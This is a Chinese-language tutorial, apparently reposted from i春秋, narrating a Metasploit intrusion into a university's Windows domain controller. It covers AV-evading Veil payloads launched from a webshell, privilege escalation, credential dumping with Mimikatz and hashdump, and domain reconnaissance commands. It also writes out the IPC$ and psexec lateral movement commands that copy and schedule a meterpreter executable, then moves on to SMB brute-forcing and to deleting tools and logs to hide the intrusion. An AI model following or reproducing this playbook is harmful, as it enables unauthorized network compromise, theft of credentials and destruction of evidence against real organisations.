?

本文作者：i 春秋簽約作家——shuteer

?前期準備：1. 使用Veil生成免殺PAYLOAD； 2. 有一個外網IP的服務器，安裝好metasploit，方便操作。

一．SHELL反彈meterpreter

上傳免殺的PAYLOAD到SHELL（有時候會碰到EXE文件上傳不了，可以使用powershell的meterpreter模塊“XX.bat格式”來實現），然后在菜刀或者WEBSHELL下面運行，反彈成功。

二．提權

反彈成功后第一步就是getuid看權限，然后嘗試提權，有以下幾種方法

1.利用漏洞模塊提權，如ms15_05之類

2.令牌假冒

3.繞過Windows賬戶控制，比如Bypassuac提權

4.HASH攻擊

如果服務器沒有提權成功也不要緊，可以以此服務器為跳板，攻擊內網其它服務器

好吧，我是system權限，就不用提權了，直接抓HASH吧！

1.使用WCE和MIMIKATZ（這2個工具必須要管理員的權限，而且注意工具的免殺）

2.使用MSF的hashdump模塊，一個是hashdump，只能導出本地hash,另一個是smart_hashdump(必須是管理員權限),可以導出域用戶的hash

3.使用Powershell模塊直接導出

三．信息收集

1.ipconfig /all

http://2.net view /domain 查看有幾個域

http://3.net view /domain:XXX 查看此域內電腦

http://4.net group /domain 查詢域里面的組

http://5.net group “domain admins” /domain 查看域管理員

http://6.net group “domain controllers” /domain 查看域控制器

http://7.net group “enterprise admins” /domain 查看企業管理組

其他還有很多，網上可以一搜一大把，大家可以都試試

此時我們大概清楚了該內網的大概拓撲，知道域服務器是10.48.128.20

四．分析下一步攻擊方向

分析下此時情況，我們已經獲取了一個服務器的密碼。我們第一目標當然是域服務器，此時有二種情況，當前服務器可以連接域服務器和不可以連接域服務器

A．如果不能直接攻擊域服務器，我們需要再攻擊內網某個服務器，然后再攻擊域服務器

1.我們可以利用抓到的密碼加上我們收集的信息編個字典，然后添加路由進行弱口令的掃描

2.使用p**ec爆破整個局域網或者反彈meterpreter

3.利用smb_login模塊掃描內網

4.利用當前權限，用WIN下面的P**ec進行內網滲透

5.使用powershell對內網進行掃描（要求WIN7以上服務器）

6.架設socks4a，然后進行內網掃描

7.利用當前權限，進行內網IPC$滲透

B.可以直接攻擊域服務器

五. 攻擊域服務器

我們這次是可以直接攻擊域服務器的，所以我們用最簡單的方法IPC$滲透先試試

失敗了

我們再用WIN下面的P**ec試試

又失敗了，不應該啊，我們再仔細分析下，加上域名試試。

看，成功了，我們net use可以看到已經成功連接上了

Net use \\ip\c$

Copy sd.exe \\ip\c$ (其中sd.exe是VEIL生成的meterpreter)

Net time \\ip

At \\ip time c:\sd.exe

具體看截圖

然后exit到meterpreter,設置meterpreter>background，

設置監聽，等待反彈

可以看到，已經反彈成功了，我們看下IP地址是不是域服務器的

我們已經成功的獲取了域服務器的meterpreter,看下權限getuid

好吧，我們是system權限，就不用提權了，為了使meterpreter shell更穩定和更隱蔽，先把meterpreter shell程序進程遷移到EXPLORE進程

PS 獲取一系列的運行進程，使用migrate PID ,然后KILL掉原來的進程

我們接下來抓HASH,可以用Mimikatz也可以用run post/windows/gather/hashdump

PS:我們在用Mimikatz抓HASH之前要注意一點，如果服務器是安裝的64位操作系統，要把Mimikatz進程遷移到一個64位的程序進程中，才能查看64位系統密碼明文。32位系統沒有這個限制，都可以查看系統密碼.

這里為了方便，我們使用hashdump來抓hash，run post/windows/gather/hashdump

失敗了，權限不夠，我們看下自己的權限，因為剛才遷移PAYLOAD進程時候，EXPLOR是administrator權限，我們getsystem,再抓，見圖，成功了

六．SMB快速擴張控制權限

參照第4步，這里我們使用p**ec爆破內網或者利用smb_login模塊爆破內網

1.msf 添加路由 route add ip mask sessionid

2.smb_login模塊或者p**ec_scanner模塊

查看爆破成功的機器 creds

最后我們看一下session控制圖

七．擦PP

所有操作完成后，一定要記得清理下痕跡

1.刪除所有使用的工具

2.刪除所有操作記錄

3.關閉所有的meterpreter

《Metasploit——后門篇》返回到 i春秋社區 < < < < 查看哦，謝謝！

總結

以上是生活随笔為你收集整理的Metasploit渗透某高校域服务器的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。